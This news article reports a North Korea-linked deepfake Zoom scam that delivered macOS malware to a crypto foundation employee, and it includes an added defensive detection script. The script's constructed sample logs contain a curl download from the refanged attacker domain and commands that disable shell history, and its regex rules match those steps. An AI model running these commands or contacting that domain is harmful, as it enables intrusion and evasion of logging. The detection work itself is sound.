North Korean hackers use deepfake Zoom scam to breach crypto foundation
Tshedimoso Makhene
Jun 26, 2025 8:49:42 AM

North Korea-linked hacking group BlueNoroff has executed a sophisticated deepfake Zoom scam to infiltrate a cryptocurrency foundation.
What happened
A North Korea–linked cyber‑espionage unit known as BlueNoroff executed a sophisticated deepfake Zoom scam targeting a Web3 employee at a cryptocurrency foundation. The attacker contacted the victim via Telegram, posing as an external professional and sending a Calendly link. Although the link appeared to schedule a Google Meet, it redirected the employee to a fake Zoom domain under the attacker's control.
When the employee joined, they encountered a group Zoom session featuring AI-generated deepfake video feeds of their own senior executives. Citing microphone trouble on the call, the deepfakes advised the target to install a “Zoom extension,” which actually delivered a malicious AppleScript dubbed zoom_sdk_support.scpt.
Going deeper
Once activated, the AppleScript opened a legitimate Zoom SDK page, then secretly fetched a shell script from a malicious server (“support[.]us05web-zoom[.]biz”). The script disabled bash history logging, checked for Rosetta 2 (installing it silently if necessary), created a hidden “.pwd” file, and downloaded multiple malicious binaries to “/tmp/icloud_helper,” all while prompting the user to enter their system password.
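The chain described above leaves a handful of host-level traces that a defender can look for in process and file telemetry. The following Python script is an added example, not code from Huntress or from the article: it scans constructed sample event lines for each stage the article describes (the zoom_sdk_support.scpt AppleScript, the attacker domain, bash history being disabled, a Rosetta 2 install, the hidden .pwd file, writes under /tmp/icloud_helper) and grades each host by how many distinct stages appear. The exact commands the script used to disable history and install Rosetta are not given in the article, so those two patterns are assumptions; the event format, hostnames, paths and timestamps in the sample are constructed.

```python
"""Triage macOS process/file events for the stages of the chain described
in the article.  Indicators come from the article; the history-disabling and
Rosetta patterns are assumed common forms of those actions, and the sample
events below are constructed, not real telemetry."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List

# The article gives the domain defanged as support[.]us05web-zoom[.]biz;
# it is refanged here purely so it can be matched in log lines.
ATTACKER_DOMAIN = "us05web-zoom.biz"
STAGING_DIR = "/tmp/icloud_helper"

# One rule per stage of the described chain.
RULES = [
    ("applescript_lure", re.compile(r"osascript\b.*zoom_sdk_support\.scpt")),
    ("attacker_domain", re.compile(re.escape(ATTACKER_DOMAIN))),
    # Assumed forms of "disabled bash history logging" (not quoted in the article).
    ("history_disabled", re.compile(
        r"unset\s+HISTFILE|HISTFILE=/dev/null|set\s+\+o\s+history|HISTSIZE=0")),
    # Assumed form of the silent Rosetta 2 install (not quoted in the article).
    ("rosetta_install", re.compile(r"softwareupdate\b.*--install-rosetta")),
    ("hidden_pwd_file", re.compile(r"/\.pwd(\s|$|['\"])")),
    ("staging_dir", re.compile(re.escape(STAGING_DIR))),
]

# Assumed event format: key=value pairs, one event per line.
HOST_RE = re.compile(r"\bhost=(\S+)")


@dataclass
class Finding:
    host: str
    stage: str
    event: str


def _host_of(line: str) -> str:
    m = HOST_RE.search(line)
    return m.group(1) if m else "unknown"


def scan_events(events: Iterable[str]) -> List[Finding]:
    """Return one Finding per (event, matching stage) pair."""
    findings = []
    for line in events:
        for stage, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(_host_of(line), stage, line))
    return findings


def assess_by_host(events: Iterable[str]) -> Dict[str, dict]:
    """Group stage hits per host and grade them.

    A single stage on its own (a Rosetta install, a dotfile write) is ordinary
    activity and is only 'suspicious'; three or more distinct stages on one
    host is the shape of the chain the article describes ('likely_chain').
    """
    events = list(events)
    stages = defaultdict(set)
    hosts = {_host_of(line) for line in events}
    for f in scan_events(events):
        stages[f.host].add(f.stage)
    report = {}
    for host in hosts:
        seen = sorted(stages.get(host, set()))
        if len(seen) >= 3:
            verdict = "likely_chain"
        elif seen:
            verdict = "suspicious"
        else:
            verdict = "clean"
        report[host] = {"stages": seen, "verdict": verdict}
    return report


# Constructed sample telemetry.  mac-01 shows every stage of the chain;
# mac-02 is a normal Zoom launch and should come back clean.
SAMPLE_EVENTS = [
    "2025-06-20T10:01:02Z host=mac-01 proc=osascript args='osascript /Users/alice/Downloads/zoom_sdk_support.scpt'",
    "2025-06-20T10:01:03Z host=mac-01 proc=curl args='curl -fsSL https://support.us05web-zoom.biz/update.sh -o /tmp/update.sh'",
    "2025-06-20T10:01:04Z host=mac-01 proc=bash args='bash -c \"unset HISTFILE; set +o history\"'",
    "2025-06-20T10:01:05Z host=mac-01 proc=softwareupdate args='softwareupdate --install-rosetta --agree-to-license'",
    "2025-06-20T10:01:06Z host=mac-01 proc=bash file_write=/Users/alice/.pwd",
    "2025-06-20T10:01:07Z host=mac-01 proc=curl file_write=/tmp/icloud_helper/Telegram2",
    "2025-06-20T10:05:00Z host=mac-02 proc=zoom.us args='/Applications/zoom.us.app/Contents/MacOS/zoom.us'",
]

if __name__ == "__main__":
    for host, result in sorted(assess_by_host(SAMPLE_EVENTS).items()):
        print(f"{host}: {result['verdict']} stages={result['stages']}")
```

The three-stage threshold is the point of the design: a Rosetta 2 install or a dotfile write is routine on its own, so only the co-occurrence of several stages on one host is worth paging on, while single hits are kept as low-priority leads.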
Huntress identified at least eight malware payloads on the compromised machine, including:
- Telegram 2: a Nim-based backdoor for persistence
- Root Troy V4: a Go-based remote controller
- InjectWithDyld: a C++ loader for process injection
- XScreen: an Objective‑C keylogger capturing keystrokes, clipboard, and screen
- CryptoBot: Go-based stealer focusing on crypto‑related data
- NetChk: an idle “random number generator” payload
What was said
Huntress security researchers Alden Schmidt, Stuart Ashenbrenner, and Jonathan Semon explained that “The Calendly link was for a Google Meet event, but when clicked… redirects the end user to a fake Zoom domain controlled by the threat actor.” They added: “Remote workers, especially in high‑risk areas of work, are often the ideal targets for groups like TA444… It is important to train employees to identify common attacks that start off with social engineering related to remote meeting software.”
In the know
Deepfakes are hyper-realistic synthetic media created using artificial intelligence (AI), particularly deep learning algorithms, that manipulate or generate audio, video, or images to convincingly mimic real people. In cybercrime, deepfakes can be used to impersonate trusted individuals, such as executives or colleagues, during virtual meetings, making it easier for attackers to deceive victims into revealing sensitive information, installing malware, or authorizing fraudulent transactions.
FAQs
What was unique about this recent attack?
This attack combined deepfake video manipulation with social engineering over a fake Zoom call and used malware disguised as a Zoom extension to compromise a macOS system—a rare and sophisticated combination.
How can I spot a deepfake during a video call?
Look for visual anomalies like unnatural blinking, lag between lip movement and speech, poor lighting consistency, or audio that doesn’t match the speaker’s mouth movements.